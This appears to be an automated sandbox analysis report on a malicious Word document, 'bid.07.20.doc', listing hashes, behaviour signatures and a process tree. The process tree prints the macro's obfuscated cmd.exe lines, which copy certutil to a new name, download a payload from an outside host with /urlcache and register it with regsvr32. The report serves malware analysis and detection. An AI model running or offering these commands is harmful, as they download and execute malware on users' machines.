Analysis

  • max time kernel
    145s
  • max time network
    130s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    03-08-2020 20:04

General

  • Target

    bid.07.20.doc

  • Size

    110KB

  • MD5

    df1c3c76ae77a9c9e14e642e211e1cdf

  • SHA1

    012dcfc2876916eaf12c1356e5fe893c7d155c70

  • SHA256

    a01810ab151d6b800e1b6d9c692485fe5c6462d7c6900b197cebd19a3c7a154f

  • SHA512

    7bf330e64225a6294b3085fdc435478c5405f2c4379ceca4e285e319288091a7cd72ea688ff944414cbc62ef28240a9a05b4bb202fce1fe9959e7de1898ab1dd

Score
10/10

Malware Config

Signatures

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Suspicious use of SetWindowsHookEx 21 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bid.07.20.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    • Enumerates system info in registry
    • Drops file in Program Files directory
    • Suspicious use of SetWindowsHookEx
    PID:3704
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
      2⤵
      • Process spawned unexpected child process
      PID:2164
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      2⤵
      • Suspicious use of WriteProcessMemory
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Process spawned unexpected child process
      PID:3596
      • C:\ProgramData\1.exe
        C:\ProgramData\1.exe /urlcache /f http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp
        3⤵
        • Executes dropped EXE
        PID:3612

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3704-0-0x000001F6C2C38000-0x000001F6C2C3B000-memory.dmp

    Filesize

    12KB

  • memory/3704-1-0x000001F6C2C38000-0x000001F6C2C3B000-memory.dmp

    Filesize

    12KB

  • memory/3704-2-0x000001F6C2C3B000-0x000001F6C2C40000-memory.dmp

    Filesize

    20KB